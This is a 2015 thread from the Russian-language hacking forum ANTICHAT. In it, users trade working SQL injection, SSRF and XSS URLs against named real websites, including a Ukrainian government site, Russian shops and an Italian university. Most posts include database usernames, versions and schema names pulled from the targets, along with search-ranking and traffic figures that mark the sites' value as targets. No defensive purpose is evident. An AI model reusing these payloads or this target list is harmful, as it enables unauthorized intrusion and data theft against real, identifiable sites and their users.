ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.06.2015, 12:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
SSRF:
Код:
Code:
http://fcgoverla.uz.ua/lib/imageresize.php?cache=1&h=375&imgurl=ftp://test.antichat/image.ssrf&w=500
|
|
|
|
06.06.2015, 23:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
1213
Репутация:
5
|
|
Код:
Code:
http://dazo.gov.ua/index.php?id=query&sid=-15 union select concat(0x3c623e3c666f6e7420636f6c6f723d72656420666163653d47656f726769613e,0x3e3e496e6a65637420627920526f73736f203c3c,0x3c62723e,0x3c2f623e3c2f666f6e743e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database())--+
User: dazo_yura@localhost
Version: 5.5.41-0ubuntu0.14.04.1
Database: dazo_dazo
ТИЦ: 20
PR: 4 |
|
|
|
07.06.2015, 04:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
940
Репутация:
1
|
|
www.the-ice-man.co.uk
Код:
Code:
http://www.the-ice-man.co.uk/prodisp.php?prodcatind=1&subcatind=1&pageind=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x3a,version(),database(),user(),@@version _compile_os),16+--+
4.1.22-standard:theqice_manicefruit:theqice@localhost: pc-linux-gnu
Префикс таблиц: 'theqice_'
inurl:"prodisp.php?prodcatind"
Чет я не понял, пофиксили чтоли уже;/
|
|
|
|
11.06.2015, 13:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
SQL-inj
Код:
Code:
http://chorus.kh.ua/album.php?id=-1+UNION+SELECT+1,user(),3+--+
|
|
|
|
11.06.2015, 13:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
8455
Репутация:
7
|
|
Код:
Code:
http://www.ruslang.ru/agens.php?id=999999.9'+union+all+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8+--+
ТИц 1400
PR 5
5.5.41-MariaDB
Код:
Code:
http://www.komod.ru/garniture/search/?query=99'+or+1=(sElEcT+1+fRoM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,dAtAbAsE(),0x217e21,vErSiOn(),0x217e21,uSeR(),0x217e21))+fRoM+information_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+and+'1'='1
[COLOR="rgb(255, 0, 0)"]ТИц[/COLOR] 900
[COLOR="rgb(0, 179, 0)"]PR[/COLOR] 3
Li 6к трафа
5.6.15-63.0-log
Код:
Code:
http://dynatone.ru/newslist.php?ngr=2'+and(sElEcT+1+fRoM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,dAtAbAsE(),0x217e21,vErSiOn(),0x217e21,uSeR(),0x217e21))+fRoM+information_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+and+'1'='1
[COLOR="rgb(255, 0, 0)"]ТИц[/COLOR] 1700
[COLOR="rgb(0, 179, 0)"]PR[/COLOR] 3
Li 3к трафа
5.1.63-0+squeeze1
Код:
Code:
http://www.auto-magnitola.ru/auto/index.php?firma=9'+union+all+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,NULL,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
ТИц 450
PR 4
Alexa 300к
5.5.33-log
Li 5к трафа
Код:
Code:
domkom.ru/admin/stuffs_add.php?id_type=7'+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5,6+--+
[COLOR="rgb(255, 0, 0)"]ТИц[/COLOR] 275
[COLOR="rgb(0, 179, 0)"]PR[/COLOR] 3
5.6.15-63.0-log
|
|
|
|
14.06.2015, 13:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
8455
Репутация:
7
|
|
Код:
Code:
http://www.province.ru/doska/ind.php?id_typ=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+
CMS:Joomla
ТИц 1900
PR 5
LI скачет, но в основном 20к уников в день
5.1.49-3
|
|
|
|
14.06.2015, 14:04
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от M_script
M_script said:
↑
Хватит RU/UA ломать. В других доменных зонах есть миллионы сайтов. Как скажете.
http://iunisa.unisa.it/podcast-1061...,4,5,6,7,version(),9,10,11,12,13,14,15,16--+k
Файл скачивается
|
|
|
16.06.2015, 19:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
97570
Репутация:
267
|
|
Сообщение от kingbeef
kingbeef said:
↑
Как скажете.
http://iunisa.unisa.it/podcast-1061...,4,5,6,7,version(),9,10,11,12,13,14,15,16--+k
Файл скачивается по моему следует запретить постить тут уязвимости тем, кто давно может делать это в специально отведенных темах что висят в профильных разделах
Сообщение от None
Регистрация: 8.04.2010
Сообщения:
385может ты уже перерос песочницу??
|
|
|
|
17.06.2015, 18:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
97570
Репутация:
267
|
|
Сообщение от semen6192
semen6192 said:
↑
Только вот я не понимаю где будет писать/отображать версию БД? в файле который ты скачал:
1) в названии файла 5.1.23-rc-community-log.txt
2) ошибка с раскрытием в тексте файла
Сообщение от None
Warning: filesize() [function.filesize]: stat failed for
5.1.23-rc-community-log
in /var/www/html/iunisa/pod_proxy.php on line 166
Notice: Undefined index: HTTP_REFERER in /var/www/html/iunisa/pod_proxy.php on line 26
Notice: Undefined index: cat_event in /var/www/html/iunisa/pod_proxy.php on line 180
Warning: readfile(
http://iunisa.unisa.it/
5.1.23-rc-community-log
) [function.readfile]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found
in /var/www/html/iunisa/pod_proxy.php on line 188
|
|
|
|
19.06.2015, 16:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
XSS:
Код:
Code:
http://www.62.ua/banks/type/1?bank_id=1&income_statement=1&sum=10000%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt%3E&term=1
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
